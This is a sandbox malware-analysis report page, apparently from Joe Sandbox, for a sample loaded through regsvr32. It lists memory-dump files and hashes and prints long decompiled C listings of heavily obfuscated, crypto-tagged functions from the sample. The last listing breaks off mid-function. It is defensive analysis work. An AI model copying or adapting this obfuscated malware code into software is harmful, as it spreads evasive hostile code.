Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: 8c14ae28bebc8685e7a32c4e17e503142069960fcfdc2eeee4c47c3eb6088045
Instruction ID: 316f11765196d9e451ee1a414d089055bc0c0271a275787a4bf04922baf54119
Opcode Fuzzy Hash: 8c14ae28bebc8685e7a32c4e17e503142069960fcfdc2eeee4c47c3eb6088045
Instruction Fuzzy Hash: 43F08C7E79079B26FA64A6A95E42FDA1125CB80BD4FB30532BB01EA0D28DD19C425278

Uniqueness

Uniqueness Score: -1.00%

Function 003D609A Relevance: 5.3, Strings: 4, Instructions: 320
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E003D609A(intOrPtr* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t335;
				void* _t341;
				void* _t345;
				void* _t370;
				void* _t379;
				signed int _t382;
				signed int _t383;
				signed int _t385;
				signed int _t387;
				signed int _t388;
				signed int _t390;
				signed int _t392;
				signed int _t393;
				signed int _t397;
				signed int _t398;
				intOrPtr _t400;
				intOrPtr* _t437;
				intOrPtr _t441;
				signed int* _t442;

				_t442 =  &_v48;
				_t441 = 0;
				_v12 = 0x873c1;
				_t437 = __ecx;
				_v8 = 0;
				_v16 = __ecx;
				_t379 = 0xfe289;
				_v4 = 0;
				while(1) {
					L1:
					_t335 = 0x95094;
					do {
						while(_t379 != 0x13f4c) {
							if(_t379 == 0x40bd4) {
								_v28 = 0x839abe;
								_v28 = _v28 | 0xb4f9d8aa;
								_t392 = 0x24;
								_v28 = _v28 / _t392;
								_v28 = _v28 ^ 0x050482de;
								_v40 = 0xf20553;
								_v40 = _v40 ^ 0x781615af;
								_v40 = _v40 >> 2;
								_t393 = 0x3f;
								_v40 = _v40 / _t393;
								_v40 = _v40 ^ 0x007750a2;
								E003D8B16(_v28, _v20, _t393, _v40);
							} else {
								if(_t379 == _t335) {
									_v40 = 0x394925;
									_v40 = _v40 | 0x8f209b92;
									_t397 = 0x15;
									_v40 = _v40 / _t397;
									_t398 = 0x4e;
									_v40 = _v40 * 0xf;
									_v40 = _v40 ^ 0x66498541;
									_v44 = 0x3e5d1d;
									_v44 = _v44 / _t398;
									_v44 = _v44 ^ 0x19df85b1;
									_v44 = _v44 >> 0xc;
									_v44 = _v44 ^ 0x0009b1f2;
									_v28 = 0xdcb244;
									_v28 = _v28 * 0x55;
									_v28 = _v28 ^ 0x4942677a;
									_v48 = 0x27b7bd;
									_v48 = _v48 | 0xf3572b87;
									_v48 = _v48 + 0xffff1349;
									_v48 = _v48 >> 0xe;
									_v48 = _v48 ^ 0x000bb131;
									_t370 = E003CD933(_v40, _v44, 0x3c126c, _v28, _v48);
									_v28 = 0xd4c81;
									_v28 = _v28 + 0xffff0d4d;
									_v28 = _v28 * 0x3f;
									_v28 = _v28 ^ 0x030ff631;
									_v24 = 0x5218df;
									_v24 = _v24 >> 9;
									_v24 = _v24 ^ 0x0002d3cd;
									_v32 = 0x3bb025;
									_v32 = _v32 ^ 0x52d15dc1;
									_v32 = _v32 >> 5;
									_v32 = _v32 ^ 0x029a7143;
									_v44 = 0x6442ca;
									_v44 = _v44 * 0x39;
									_v44 = _v44 + 0xffffd403;
									_v44 = _v44 + 0x8950;
									_v44 = _v44 ^ 0x16572730;
									_v40 = 0x7cd12b;
									_v40 = _v40 << 2;
									_v40 = _v40 + 0xecf2;
									_v40 = _v40 * 0x3d;
									_v40 = _v40 ^ 0x7723210d;
									_v36 = 0xa5bd24;
									_v36 = _v36 * 0x30;
									_v36 = _v36 >> 1;
									_v36 = _v36 ^ 0x0f8788f8;
									_v48 = 0xca88fb;
									_v48 = _v48 ^ 0xa7dcf5e0;
									_v48 = _v48 + 0xffff5075;
									_v48 = _v48 ^ 0xa71f8447;
									_t400 =  *0x3e221c; // 0x0
									E003D43E3(_t400 + 0x60, _v28, _v24,  *((intOrPtr*)(_t437 + 4)), _v32, _v40,  *_t437, _v20, _v44, _t370, _v40, _v36, _v40, _v48);
									_v36 = 0x8d715d;
									_t379 = 0x40bd4;
									_push(0x64);
									_t441 =  ==  ? 1 : _t441;
									_v36 = _v36 >> 3;
									_v36 = _v36 | 0x57a88aa2;
									_v36 = _v36 ^ 0x57b00155;
									_v32 = 0xbe137a;
									_v32 = _v32;
									_v32 = _v32 >> 7;
									_v32 = _v32 ^ 0x000183f6;
									_v28 = 0x2e3dd0;
									_v28 = _v28 | 0x520ee8da;
									_v28 = _v28 + 0xffff7a50;
									_v28 = _v28 ^ 0x5222b59b;
									E003C43D3(_v36, _v32, _v28, _t370);
									_t442 =  &(_t442[0x11]);
									goto L1;
								} else {
									if(_t379 != 0xfe289) {
										goto L9;
									} else {
										_t379 = 0x13f4c;
										continue;
									}
								}
							}
							L12:
							return _t441;
						}
						_v44 = 0x2bd2f4;
						_v44 = _v44 >> 0xe;
						_v44 = _v44 ^ 0xb0b67272;
						_v44 = _v44 + 0xffff9769;
						_v44 = _v44 ^ 0xb0b68411;
						_v28 = 0xaa4ca5;
						_v28 = _v28 + 0x7b62;
						_v28 = _v28 ^ 0x00ab9da2;
						_v24 = 0xa81ead;
						_t382 = 0x33;
						_v24 = _v24 / _t382;
						_v24 = _v24 ^ 0x00037943;
						_v40 = 0xad7de2;
						_t383 = 5;
						_v40 = _v40 * 0x12;
						_v40 = _v40 / _t383;
						_v40 = _v40 + 0xffff2243;
						_v40 = _v40 ^ 0x0260cb7c;
						_t341 = E003CD933(_v44, _v28, 0x3c137c, _v24, _v40);
						_v32 = 0xc9bae8;
						_t385 = 0x7c;
						_v32 = _v32 * 6;
						_v32 = _v32 + 0xffff15a6;
						_v32 = _v32 ^ 0x04b2c614;
						_v24 = 0xc1b413;
						_v24 = _v24 ^ 0x6f0c0796;
						_v24 = _v24 ^ 0x6fc7cead;
						_v40 = 0xa34dbc;
						_v40 = _v40 | 0x39b8d45d;
						_v40 = _v40 / _t385;
						_v40 = _v40 | 0xe03b0ad9;
						_v40 = _v40 ^ 0xe0732f9f;
						_v28 = 0x43dc0;
						_v28 = _v28 >> 2;
						_v28 = _v28 >> 7;
						_v28 = _v28 ^ 0x000af907;
						_t345 = E003CD933(_v32, _v24, 0x3c121c, _v40, _v28);
						_v32 = 0x3cac4e;
						_v32 = _v32 + 0xffffd682;
						_v32 = _v32 ^ 0x0032f2dc;
						_v28 = 0x927b06;
						_v28 = _v28 + 0xffff7f72;
						_v28 = _v28 + 0xe99d;
						_v28 = _v28 ^ 0x0093bce9;
						_v24 = 0x33a09a;
						_v24 = _v24 + 0x9171;
						_v24 = _v24 ^ 0x003c4a48;
						_v40 = 0x47f590;
						_v40 = _v40 >> 0xd;
						_v40 = _v40 + 0x3a48;
						_v40 = _v40 + 0x799a;
						_v40 = _v40 ^ 0x00000f10;
						E003C22D2( &_v20, _v32, _t341, _v28, _v24, _t345, _v40);
						_v44 = 0x651cb4;
						_t379 =  ==  ? 0x95094 : 0x24d90;
						_v44 = _v44 >> 0xe;
						_v44 = _v44 + 0xffff43e9;
						_v44 = _v44 ^ 0xc3360ada;
						_v44 = _v44 ^ 0x3cca4128;
						_v40 = 0x85d774;
						_t387 = 0x7d;
						_v40 = _v40 * 0x5e;
						_t388 = 0x57;
						_v40 = _v40 / _t387;
						_v40 = _v40 >> 0xb;
						_v40 = _v40 ^ 0x00024030;
						_v28 = 0x84528f;
						_v28 = _v28 + 0x1d19;
						_v28 = _v28 / _t388;
						_v28 = _v28 ^ 0x000e8db4;
						E003C43D3(_v44, _v40, _v28, _t341);
						_v28 = 0xb7a4b8;
						_t390 = 0x61;
						_v28 = _v28 * 0x69;
						_v28 = _v28 ^ 0x4b53d08d;
						_v40 = 0xff6a3c;
						_v40 = _v40 + 0xa9bc;
						_v40 = _v40 / _t390;
						_v40 = _v40 >> 4;
						_v40 = _v40 ^ 0x0004353a;
						_v24 = 0xcd5b99;
						_v24 = _v24 >> 6;
						_v24 = _v24 ^ 0x0002fada;
						E003C43D3(_v28, _v40, _v24, _t345);
						_t437 = _v16;
						_t442 =  &(_t442[0x10]);
						_t335 = 0x95094;
						L9:
					} while (_t379 != 0x24d90);
					goto L12;
				}
			}

0x003d609a
0x003d60a1
0x003d60a3
0x003d60ab
0x003d60ad
0x003d60b1
0x003d60b5
0x003d60ba
0x003d60be
0x003d60be
0x003d60be
0x003d60c3
0x003d60c3
0x003d60d5
0x003d663e
0x003d6648
0x003d6656
0x003d665b
0x003d6661
0x003d6669
0x003d6671
0x003d6679
0x003d6682
0x003d6685
0x003d6689
0x003d669e
0x003d60db
0x003d60dd
0x003d60f2
0x003d60fc
0x003d610a
0x003d610f
0x003d611a
0x003d611b
0x003d611f
0x003d6127
0x003d6135
0x003d6139
0x003d6141
0x003d6146
0x003d614e
0x003d615b
0x003d615f
0x003d6167
0x003d616f
0x003d6177
0x003d617f
0x003d6184
0x003d61a1
0x003d61a6
0x003d61b0
0x003d61c0
0x003d61c4
0x003d61cc
0x003d61d4
0x003d61d9
0x003d61e1
0x003d61e9
0x003d61f1
0x003d61f6
0x003d61fe
0x003d620b
0x003d620f
0x003d6217
0x003d621f
0x003d6227
0x003d622f
0x003d6234
0x003d6241
0x003d6245
0x003d624d
0x003d625a
0x003d625e
0x003d6262
0x003d626a
0x003d6272
0x003d627a
0x003d6282
0x003d62ae
0x003d62bb
0x003d62c0
0x003d62cb
0x003d62d2
0x003d62d4
0x003d62d7
0x003d62dc
0x003d62e6
0x003d62ee
0x003d62fe
0x003d6302
0x003d6307
0x003d630f
0x003d6317
0x003d631f
0x003d6327
0x003d633b
0x003d6340
0x00000000
0x003d60df
0x003d60e5
0x00000000
0x003d60eb
0x003d60eb
0x00000000
0x003d60eb
0x003d60e5
0x003d60dd
0x003d66a7
0x003d66ae
0x003d66ae
0x003d6348
0x003d6352
0x003d6357
0x003d635f
0x003d6367
0x003d636f
0x003d6377
0x003d637f
0x003d6387
0x003d6395
0x003d639a
0x003d63a0
0x003d63a8
0x003d63b5
0x003d63b6
0x003d63c0
0x003d63c4
0x003d63cc
0x003d63e9
0x003d63ee
0x003d6401
0x003d6402
0x003d6406
0x003d640e
0x003d6416
0x003d641e
0x003d6426
0x003d642e
0x003d6436
0x003d6444
0x003d6448
0x003d6450
0x003d6458
0x003d6460
0x003d6465
0x003d646a
0x003d6487
0x003d648c
0x003d6496
0x003d649e
0x003d64a6
0x003d64ae
0x003d64b6
0x003d64be
0x003d64c6
0x003d64ce
0x003d64d6
0x003d64de
0x003d64e6
0x003d64eb
0x003d64f3
0x003d64fb
0x003d6519
0x003d651e
0x003d6532
0x003d6535
0x003d653a
0x003d6544
0x003d654c
0x003d6554
0x003d6563
0x003d6566
0x003d6570
0x003d6571
0x003d6577
0x003d657c
0x003d6584
0x003d658c
0x003d659b
0x003d659f
0x003d65b3
0x003d65b8
0x003d65c9
0x003d65cb
0x003d65cf
0x003d65d7
0x003d65df
0x003d65ed
0x003d65f1
0x003d65f6
0x003d65fe
0x003d6606
0x003d660b
0x003d661f
0x003d6624
0x003d6628
0x003d662b
0x003d6630
0x003d6630
0x00000000
0x003d663c

Strings

b{, xrefs: 003D6377
H:, xrefs: 003D64EB
!#w, xrefs: 003D6245
zgBI, xrefs: 003D615F

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !#w$H:$b{$zgBI
API String ID: 0-2500024832
Opcode ID: 68b6c125e658b9fbf50b20058a4c080ebb85623e8322d07023940fa7889c21fd
Instruction ID: 0a92881994de6fa8b5c4e906d0c2d2d6489cc214743c17cd622ef059431f28f0
Opcode Fuzzy Hash: 68b6c125e658b9fbf50b20058a4c080ebb85623e8322d07023940fa7889c21fd
Instruction Fuzzy Hash: 04F11D715083419FC349CF65D68A80BFBE1FBD8B58F108A1EF5959A260D7B5CA09CF82

Uniqueness

Uniqueness Score: -1.00%

Function 003D2CAC Relevance: 5.3, Strings: 4, Instructions: 284
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E003D2CAC(intOrPtr __ecx, signed int __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t280;
				signed int _t323;
				intOrPtr _t324;
				signed int _t325;
				signed int _t328;
				signed int _t329;
				signed int _t332;
				intOrPtr _t333;
				signed int _t335;
				signed int _t338;
				signed int _t339;
				signed int _t340;
				signed int _t352;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				signed int _t377;
				signed int _t378;
				signed int _t379;
				signed int _t380;
				signed int* _t381;

				_t324 = __ecx;
				_t381 =  &_v60;
				_v16 = 0x7a4a3;
				_t374 = _v20;
				_t280 = 0x3ba4b;
				_v24 = __edx;
				_t323 = _v24;
				_v12 = 0xc88dd;
				_t373 = _v24;
				_v44 = 0;
				_t377 = _v24;
				_v8 = 0x75f71;
				_v40 = __ecx;
				_v4 = 0xb66de;
				while(_t280 != 0x3ba4b) {
					if(_t280 == 0x96dbc) {
						_v48 = 0xa31fa;
						_v48 = _v48 >> 5;
						_v48 = _v48 ^ 0x0001518f;
						_t374 = _v48;
						_v52 = 0x8c8250;
						_v52 = _v52 | 0xe8a7aee5;
						_v52 = _v52 ^ 0xe8a475a5;
						_v48 = 0x8940d6;
						_v48 = _v48 ^ 0x4128aa35;
						_v48 = _v48 | 0x43eeaf94;
						_v48 = _v48 ^ 0x43e09488;
						_v56 = 0x39a846;
						_v56 = _v56 + 0x4fe3;
						_t325 = 0x4b;
						_push(_t325);
						_v56 = _v56 / _t325;
						_v56 = _v56 >> 9;
						_v56 = _v56 ^ 0x000fd89f;
						_push(_t325);
						_t373 = E003C8D52(_t325, _t374, __eflags);
						__eflags = _t373;
						if(__eflags == 0) {
							goto L14;
						} else {
							_t377 = _t373;
							_t323 = _t374;
							goto L9;
						}
					} else {
						if(_t280 != 0xa4c89) {
							L13:
							__eflags = _t280 - 0x8d98b;
							if(__eflags != 0) {
								continue;
							} else {
								goto L14;
							}
						} else {
							_v56 = 0xa4574c;
							_v56 = _v56 ^ 0x1943489c;
							_v56 = _v56 + 0xfffff4a7;
							_v44 = 0x72;
							_v44 = 0x78;
							_v56 = _v56 / _v44;
							_v56 = _v56 ^ 0x003eef5d;
							_v60 = 0x88fc28;
							_v60 = _v60 | 0x283e1e0f;
							_v44 = 0x69;
							_v60 = _v60 / _v44;
							_v60 = _v60 + 0xc1bc;
							_v60 = _v60 ^ 0x0055f6f1;
							_v48 = 0x91361c;
							_v48 = _v48 | 0xd247fef3;
							_v44 = 0x32;
							_v48 = _v48 / _v44;
							_v48 = _v48 ^ 0x020c7df7;
							_v52 = 0x3ca7a8;
							_v52 = _v52 * 0x2c;
							_v52 = _v52 / _v44;
							_v52 = _v52 ^ 0x003b560f;
							_t332 = E003C5D75(_v56, _v60,  &_v36, _t323, _t377, _v48, _t324, _v52);
							_t381 =  &(_t381[6]);
							_v44 = _t332;
							if(_t332 == 0) {
								_t378 = _v44;
								goto L18;
							} else {
								_t333 = _v36;
								if(_t333 == 0) {
									L14:
									_t378 = _v44;
									__eflags = _t378;
									if(__eflags == 0) {
										L18:
										_v60 = 0x6e5dc7;
										_t328 = 0x34;
										_v60 = _v60 / _t328;
										_v60 = _v60 ^ 0xe00bb050;
										_t329 = 0x4c;
										_v60 = _v60 * 0x23;
										_v60 = _v60 ^ 0xa15d9093;
										_v52 = 0xeb4e8b;
										_v52 = _v52 + 0xffff4a62;
										_v52 = _v52 ^ 0x00e0b021;
										_v48 = 0x5b7a89;
										_v48 = _v48 / _t329;
										_v48 = _v48 ^ 0x0000e9cb;
										_v56 = 0x4d242e;
										_v56 = _v56 + 0xe490;
										_v56 = _v56 | 0x4b8b85b6;
										_v56 = _v56 + 0xb700;
										_v56 = _v56 ^ 0x4bd19f72;
										E003C79D0(_v60, _v52, __eflags, _v48, _t373, _v56);
									} else {
										_t352 = _v24;
										_t375 = _t374 - _t323;
										__eflags = _t375;
										 *_t352 = _t373;
										 *(_t352 + 4) = _t375;
									}
								} else {
									_t377 = _t377 + _t333;
									_t323 = _t323 - _t333;
									_t389 = _t323;
									if(_t323 != 0) {
										L9:
										_t324 = _v40;
										_t280 = 0xa4c89;
										continue;
									} else {
										_v56 = 0xc5f1c5;
										_v56 = _v56 | 0x9eb4f87e;
										_v56 = _v56 >> 0x10;
										_t379 = 0x75;
										_v56 = _v56 * 0x3e;
										_v56 = _v56 ^ 0x00267f54;
										_v52 = 0x35a86c;
										_v52 = _v52 | 0x589c5e15;
										_v52 = _v52 ^ 0xbed287b2;
										_v52 = _v52 ^ 0xe6668900;
										_v48 = 0x251bb2;
										_v48 = _v48 + 0xffffd34d;
										_v48 = _v48 | 0xed04ecb2;
										_v48 = _v48 ^ 0xed264cd0;
										_v56 = 0xacb9c3;
										_v56 = _v56 | 0xd382b6d9;
										_t335 = _v56 * _t374;
										_v56 = _v56 * 0x65;
										_push(_t335);
										_v56 = _v56 / _t379;
										_v56 = _v56 ^ 0x01252a77;
										_push(_t335);
										_v28 = _t335;
										_t380 = E003C8D52(_t335, _t335, _t389);
										_v32 = _t380;
										_t390 = _t380;
										if(_t380 == 0) {
											goto L14;
										} else {
											_v60 = 0x376d40;
											_v60 = _v60 ^ 0x58bac9d5;
											_t338 = 0x34;
											_v60 = _v60 / _t338;
											_t339 = 0x68;
											_v60 = _v60 / _t339;
											_v60 = _v60 ^ 0x000e9946;
											_v52 = 0xab88ea;
											_v52 = _v52 | 0xea69b605;
											_v52 = _v52 ^ 0xeaeed2d9;
											_v48 = 0x91e9be;
											_v48 = _v48 | 0x0ef5813f;
											_v48 = _v48 >> 7;
											_v48 = _v48 ^ 0x00160ede;
											_v56 = 0x1e801d;
											_v56 = _v56 + 0xffffd06f;
											_t340 = 0x77;
											_v56 = _v56 / _t340;
											_v56 = _v56 >> 7;
											_v56 = _v56 ^ 0x0002dc58;
											E003DF4FB(_v60, _t373, _v52, _t380, _v48, _t374, _v56);
											_v60 = 0x9e49b3;
											_v60 = _v60 | 0xbdd13336;
											_v60 = _v60 ^ 0x953e5360;
											_v60 = _v60 * 0x34;
											_v60 = _v60 ^ 0x4db88ab3;
											_v52 = 0xb30ec8;
											_v52 = _v52 * 0x6c;
											_v52 = _v52 ^ 0x4b80c809;
											_v48 = 0xf807a4;
											_v48 = _v48 ^ 0x452f2ca2;
											_v48 = _v48 >> 6;
											_v48 = _v48 ^ 0x011efe46;
											_v56 = 0xfd3806;
											_v56 = _v56 + 0x5d52;
											_v56 = _v56 | 0x9ebfefdd;
											_v56 = _v56 ^ 0x9efad727;
											E003C79D0(_v60, _v52, _t390, _v48, _t373, _v56);
											_t373 = _v32;
											_t323 = _t374;
											_t377 = _t380 + _t374;
											_t381 =  &(_t381[8]);
											_t374 = _v28;
											if(_t323 == 0) {
												goto L14;
											} else {
												goto L9;
											}
										}
									}
								}
							}
						}
					}
					return _t378;
				}
				_t280 = 0x96dbc;
				goto L13;
			}

0x003d2cac
0x003d2cac
0x003d2cb1
0x003d2cbc
0x003d2cc0
0x003d2cc5
0x003d2cc9
0x003d2ccd
0x003d2cd6
0x003d2cda
0x003d2cde
0x003d2ce2
0x003d2cea
0x003d2cee
0x003d2cf6
0x003d2d06
0x003d3054
0x003d305e
0x003d3063
0x003d306b
0x003d306f
0x003d3077
0x003d307f
0x003d3087
0x003d308f
0x003d3097
0x003d309f
0x003d30a7
0x003d30af
0x003d30bd
0x003d30c0
0x003d30c1
0x003d30c7
0x003d30cc
0x003d30e0
0x003d30e6
0x003d30ea
0x003d30ec
0x00000000
0x003d30ee
0x003d30ee
0x003d30f0
0x00000000
0x003d30f0
0x003d2d0c
0x003d2d11
0x003d30fc
0x003d30fc
0x003d3101
0x00000000
0x00000000
0x00000000
0x00000000
0x003d2d17
0x003d2d17
0x003d2d21
0x003d2d29
0x003d2d35
0x003d2d43
0x003d2d4b
0x003d2d4f
0x003d2d57
0x003d2d5f
0x003d2d71
0x003d2d79
0x003d2d7d
0x003d2d85
0x003d2d8d
0x003d2d95
0x003d2da7
0x003d2daf
0x003d2db3
0x003d2dbb
0x003d2dc8
0x003d2dd4
0x003d2ddc
0x003d2dfd
0x003d2dff
0x003d2e02
0x003d2e08
0x003d3124
0x00000000
0x003d2e0e
0x003d2e0e
0x003d2e14
0x003d3107
0x003d3107
0x003d310b
0x003d310d
0x003d3128
0x003d3128
0x003d3138
0x003d313d
0x003d3143
0x003d3150
0x003d3151
0x003d3155
0x003d315d
0x003d3165
0x003d316d
0x003d3175
0x003d3183
0x003d3187
0x003d318f
0x003d3197
0x003d319f
0x003d31a7
0x003d31af
0x003d31c8
0x003d310f
0x003d310f
0x003d3113
0x003d3113
0x003d3115
0x003d3117
0x003d3117
0x003d2e1a
0x003d2e1a
0x003d2e1c
0x003d2e1c
0x003d2e1e
0x003d3046
0x003d3046
0x003d304a
0x00000000
0x003d2e24
0x003d2e24
0x003d2e2e
0x003d2e36
0x003d2e42
0x003d2e43
0x003d2e47
0x003d2e53
0x003d2e5b
0x003d2e63
0x003d2e6b
0x003d2e73
0x003d2e7b
0x003d2e83
0x003d2e8b
0x003d2e93
0x003d2e9b
0x003d2ea8
0x003d2eab
0x003d2eb5
0x003d2eb6
0x003d2ebc
0x003d2ed0
0x003d2ed1
0x003d2eda
0x003d2edc
0x003d2ee2
0x003d2ee4
0x00000000
0x003d2eea
0x003d2eea
0x003d2ef4
0x003d2f02
0x003d2f07
0x003d2f11
0x003d2f16
0x003d2f1c
0x003d2f24
0x003d2f2c
0x003d2f34
0x003d2f3c
0x003d2f44
0x003d2f4c
0x003d2f51
0x003d2f59
0x003d2f61
0x003d2f6d
0x003d2f72
0x003d2f76
0x003d2f7b
0x003d2f95
0x003d2f9a
0x003d2fa2
0x003d2faa
0x003d2fb7
0x003d2fbb
0x003d2fc3
0x003d2fd0
0x003d2fd4
0x003d2fdc
0x003d2fe4
0x003d2fec
0x003d2ff1
0x003d2ff9
0x003d3001
0x003d3009
0x003d3011
0x003d302a
0x003d302f
0x003d3033
0x003d3035
0x003d3037
0x003d303a
0x003d3040
0x00000000
0x00000000
0x00000000
0x00000000
0x003d3040
0x003d2ee4
0x003d2e1e
0x003d2e14
0x003d2e08
0x003d2d11
0x003d3123
0x003d3123
0x003d30f7
0x00000000

Strings

R], xrefs: 003D3001
.$M, xrefs: 003D318F
@m7, xrefs: 003D2EEA
2, xrefs: 003D2DA7

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .$M$2$@m7$R]
API String ID: 0-1439080903
Opcode ID: 6c63114c081223e36f77989621f4f7989bf7e4436122f8bfb19acc6ffb3ff26b
Instruction ID: 09f259e2ea18307952e81bd173a1dc62639eca61fe6c6aca0155f729f3dedace
Opcode Fuzzy Hash: 6c63114c081223e36f77989621f4f7989bf7e4436122f8bfb19acc6ffb3ff26b
Instruction Fuzzy Hash: 47D122B550D3428FC348CF26D58690BBBE1FBD8748F104A1EF495A6260D7B5DA098F93

Uniqueness

Uniqueness Score: -1.00%

Function 003C4497 Relevance: 5.3, Strings: 4, Instructions: 253
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E003C4497(void* __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v56;
				intOrPtr _v92;
				char _v112;
				intOrPtr _v124;
				intOrPtr _v128;
				char _v132;
				signed int _v136;
				intOrPtr _v140;
				char _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				void* _t165;
				void* _t167;
				signed int _t183;
				signed int _t194;
				void* _t208;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int _t235;
				signed int _t236;
				signed int* _t239;
				void* _t241;

				_t220 = __edx;
				_push(_a8);
				_t208 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t165);
				_t236 = _v156;
				_t239 =  &(( &_v164)[4]);
				_v136 = _v136 & 0x00000000;
				_t167 = 0x89f56;
				_t235 = _v156;
				_v140 = 0x2d9a9;
				while(1) {
					_t241 = _t167 - 0x75fce;
					if(_t241 > 0) {
						goto L25;
					}
					L2:
					if(_t241 == 0) {
						_v156 = 0xc55109;
						_v156 = _v156 ^ 0x829f27f0;
						_v156 = _v156 ^ 0x825857a2;
						_v160 = 0xb1691f;
						_v160 = _v160 + 0x40a5;
						_v160 = _v160 ^ 0x00b7ca42;
						_v152 = 0x16db2e;
						_t215 = 0x7f;
						_v152 = _v152 * 0x22;
						_v152 = _v152 ^ 0x0300e79c;
						_v164 = 0x596b3f;
						_t58 =  &_v164; // 0x596b3f
						_t216 = 0x7c;
						_v164 =  *_t58 / _t215;
						_v164 = _v164 / _t216;
						_v164 = _v164 >> 0x10;
						_v164 = _v164 ^ 0x0003727d;
						_t220 = _v160;
						_t214 = _v156;
						_t194 = E003D833B(_t214, _v160, __eflags, _v152, _v164,  &_v56,  &_v148);
						_t239 =  &(_t239[4]);
						__eflags = _t194;
						if(__eflags == 0) {
							L42:
							return _t235;
						}
						L24:
						_t167 = 0xbf4ea;
						continue;
						do {
							while(1) {
								_t241 = _t167 - 0x75fce;
								if(_t241 > 0) {
									goto L25;
								}
								goto L2;
							}
							goto L25;
							L41:
							__eflags = _t167 - 0xdb04e;
						} while (__eflags != 0);
						goto L42;
					}
					if(_t167 == 0x184fb) {
						_v164 = 0x2d82a2;
						_v164 = _v164 << 5;
						_v164 = _v164 ^ 0x05b07ec0;
						_v152 = 0x8cee8f;
						_push(_t214);
						_t220 = 0x48;
						_v152 = _v152 * 0x7d;
						_v152 = _v152 ^ 0x44de8857;
						_v160 = 0x4d4176;
						_v160 = _v160 + 0xffffd975;
						_v160 = _v160 << 0xb;
						_v160 = _v160 ^ 0x68d684ed;
						_t236 = E003C8D52(_t214, _t220, __eflags);
						_t214 = _t214;
						__eflags = _t236;
						if(__eflags == 0) {
							goto L24;
						}
						 *((intOrPtr*)(_t236 + 0x10)) = _v124;
						 *((intOrPtr*)(_t236 + 0x1c)) = _v92;
						 *((intOrPtr*)(_t236 + 0x18)) = _v128;
						_t167 = 0x95c12;
						continue;
					}
					if(_t167 == 0x2f7e3) {
						__eflags = _v132 - 5;
						if(__eflags == 0) {
							_t220 = _t236;
							_t214 =  &_v112;
							E003D7CA5(_t214, _t236);
							L13:
							_t167 = 0x661a5;
							continue;
						}
						_t167 = 0x31e0d;
						continue;
					}
					if(_t167 == 0x30c08) {
						__eflags = _v132 - 4;
						if(__eflags == 0) {
							_t214 =  &_v112;
							E003DB605(_t214);
							goto L13;
						}
						_t167 = 0x2f7e3;
						continue;
					}
					if(_t167 == 0x31e0d) {
						__eflags = _v132 - 6;
						if(__eflags == 0) {
							_t214 =  &_v112;
